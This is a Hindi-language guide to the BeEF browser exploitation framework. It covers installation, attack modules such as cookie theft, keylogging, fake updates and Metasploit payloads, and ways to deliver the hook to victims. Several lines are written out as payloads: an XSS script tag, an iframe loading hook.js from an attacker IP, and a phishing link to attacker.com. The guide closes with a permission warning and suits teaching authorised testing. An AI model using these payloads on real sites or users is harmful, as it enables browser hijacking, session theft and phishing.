🐮 BeEF - Browser Exploitation Framework
🌐 Browser Exploitation 🎯 Client-Side Attacks 🕸️ XSS Framework
Category: 6️⃣ Exploitation Tools
📝 Description
BeEF (Browser Exploitation Framework) एक शक्तिशाली क्लाइंट-साइड अटैक फ्रेमवर्क है। यह वेब ब्राउज़र्स की कमजोरियों का फायदा उठाकर टारगेट के ब्राउज़र पर कंट्रोल लेता है। BeEF एक JavaScript "हुक" के माध्यम से ब्राउज़र को "ज़ॉम्बी" बना देता है, जिसके बाद आप उस ब्राउज़र पर कई कमांड्स चला सकते हैं - स्क्रीनशॉट लेना, कीस्ट्रोक लॉग करना, इंटरनल नेटवर्क स्कैन करना, और भी बहुत कुछ।
विशेषता: BeEF की सबसे बड़ी खासियत है कि यह सर्वर-साइड नहीं बल्कि क्लाइंट-साइड फोकस करता है। एक बार ब्राउज़र हुक हो जाए, तो आप उस ब्राउज़र पर पूरा कंट्रोल ले सकते हैं, चाहे वह कहीं भी हो।
📦 Installation
Kali Linux (पहले से इंस्टॉल):
beef-xss
Ubuntu/Debian:
sudo apt update sudo apt install beef-xss -y
GitHub से इंस्टॉल:
git clone https://github.com/beefproject/beef.git cd beef ./install ./beef
Docker से चलाना:
docker pull beefproject/beef docker run -p 3000:3000 -p 6789:6789 -p 61985:61985 -p 61986:61986 beefproject/beef
💻 Common Commands (उदाहरण सहित)
📌 BeEF शुरू करना:
sudo beef-xss
🔹 1. हुक (Hook) URL प्राप्त करना:
http://127.0.0.1:3000/hook.js
🔹 2. डेमो पेज पर हुक टेस्ट करना:
http://127.0.0.1:3000/demos/basic.html
🔹 3. हुक किए गए ब्राउज़र देखना:
🔹 4. ब्राउज़र पर कमांड चलाना:
🎯 BeEF के मुख्य कमांड्स (मॉड्यूल):
🔹 Browser Fingerprinting:
Browser → Detect Browser Browser → Get Browser Fingerprint
🔹 Cookies & Storage:
Browser → Get Cookie Browser → Get Local Storage Browser → Get Session Storage
🔹 Geolocation:
Browser → Get Geolocation (GPS)
🔹 Screenshot:
Browser → Take Screenshot (HTML2Canvas)
🔹 Social Engineering:
Social Engineering → Fake Notification (Chrome) Social Engineering → Fake Flash Update
🔹 Network Discovery:
Network → Ping Sweep Network → Port Scanner Network → Get Internal IP
🔹 Persistence:
Persistence → Create Pop Under Persistence → Man-in-the-Browser
🔹 Exploits:
Exploits → Internet Explorer CSS 0day Exploits → Firefox PDF Viewer Exploit
🔹 Metasploit Integration:
Metasploit → Bind Metasploit Payload Metasploit → Reverse TCP Payload
🎯 BeEF के मुख्य टैब्स:
- Getting Started: शुरुआती गाइड और डेमो लिंक्स
- Online Browsers: सभी हुक किए गए ब्राउज़र (IP, OS, ब्राउज़र वर्जन, कुकीज़, आदि)
- Commands: उपलब्ध सभी कमांड्स की लिस्ट (रंग कोडेड: ग्रीन = काम करता है, ऑरेंज = पता नहीं, रेड = काम नहीं करता)
- Logs: सभी कमांड एक्जीक्यूशन का लॉग
- REST API: API एंडपॉइंट्स (डेवलपर्स के लिए)
- Configuration: सेटिंग्स और मॉड्यूल कॉन्फ़िगरेशन
🎯 Use Cases (उपयोग के तरीके)
- XSS वल्नरेबिलिटी टेस्टिंग: XSS पेलोड्स को टेस्ट करना और उनका असर देखना।
- क्लाइंट-साइड सिक्योरिटी ऑडिट: यूजर्स के ब्राउज़र पर कितना कंट्रोल लिया जा सकता है, यह जांचना।
- सोशल इंजीनियरिंग टेस्टिंग: यूजर्स को फेक अपडेट्स पर क्लिक करने के लिए कैसे मजबूर किया जा सकता है।
- इंटरनल नेटवर्क मैपिंग: हुक किए गए ब्राउज़र से इंटरनल नेटवर्क स्कैन करना।
- Metasploit इंटीग्रेशन: ब्राउज़र हुक से Meterpreter सेशन प्राप्त करना।
⚙️ Key Features (मुख्य विशेषताएँ)
- ✔️ 200+ कमांड्स (ब्राउज़र फिंगरप्रिंटिंग, कुकी स्टीलिंग, स्क्रीनशॉट, कीलॉगर, आदि)
- ✔️ रियल-टाइम ब्राउज़र कंट्रोल
- ✔️ हुक किए गए ब्राउज़र की डिटेल्ड प्रोफाइल
- ✔️ Metasploit इंटीग्रेशन
- ✔️ REST API (ऑटोमेशन के लिए)
- ✔️ सोशल इंजीनियरिंग मॉड्यूल्स
- ✔️ इंटरनल नेटवर्क स्कैनिंग
- ✔️ पर्सिस्टेंस मैकेनिज्म (ब्राउज़र बंद होने पर भी हुक बनाए रखना)
- ✔️ वेब UI के साथ आता है
- ✔️ क्रॉस-प्लेटफॉर्म (Linux, Windows, macOS)
📌 BeEF हुक URL कैसे भेजें:
- XSS वल्नरेबिलिटी: किसी वेबसाइट में XSS पेलोड डालें:
<script src="http://your-ip:3000/hook.js"></script> - ईमेल फिशिंग: लिंक भेजें:
http://attacker.com/beef-hook.html - URL शॉर्टनर: URL शॉर्टनर से लिंक छुपाना
- Iframe:
<iframe src="http://your-ip:3000/demos/basic.html"></iframe>
📌 BeEF vs Metasploit:
- BeEF: क्लाइंट-साइड (ब्राउज़र) फोकस, सोशल इंजीनियरिंग, ब्राउज़र एक्सप्लॉइट्स
- Metasploit: सर्वर-साइड फोकस, सिस्टम एक्सप्लॉइट्स, पेलोड जनरेशन
- अनुशंसा: दोनों एक साथ उपयोग करें - BeEF से ब्राउज़र हुक करें, फिर Metasploit से Meterpreter पेलोड भेजें।
🔗 Official Resources
- Official Website: https://beefproject.com
- GitHub Repository: https://github.com/beefproject/beef
- Documentation: BeEF Wiki
- Kali Linux Tools: Kali BeEF Page
🔧 Related Tools (समान उपकरण)
- Metasploit: एक्सप्लॉइटेशन फ्रेमवर्क
- XSSer: XSS वल्नरेबिलिटी स्कैनर
- XSStrike: एडवांस्ड XSS स्कैनर
- OWASP ZAP: XSS डिटेक्शन और टेस्टिंग
- Burp Suite: XSS टेस्टिंग के लिए Intruder और Scanner
📌 BeEF के लिए सुझाव:
- पहले डेमो पेज (
/demos/basic.html) पर प्रैक्टिस करें - हुक URL को किसी XSS वल्नरेबिलिटी के माध्यम से टेस्ट करें
- Metasploit के साथ इंटीग्रेट करें (पूरा Meterpreter सेशन)
- कुकीज़ और सेशन हाईजैकिंग का प्रैक्टिस करें
- सोशल इंजीनियरिंग मॉड्यूल्स का उपयोग करें
⚠️ Important Note (सावधानी)
BeEF एक बेहद शक्तिशाली ब्राउज़र एक्सप्लॉइटेशन फ्रेमवर्क है। इसका उपयोग केवल उन्हीं सिस्टम पर करें जिनकी आपको लिखित अनुमति हो। बिना अनुमति के ब्राउज़र हुक करना, कुकी चुराना, या ब्राउज़र पर कंट्रोल लेना कानूनी अपराध है। हमेशा अपने खुद के सिस्टम, CTF चैलेंज, या बग बाउंटी प्रोग्राम पर ही प्रैक्टिस करें। BeEF का उपयोग सीखने और सुरक्षा ऑडिट के लिए करें, न कि अनधिकृत पहुंच के लिए।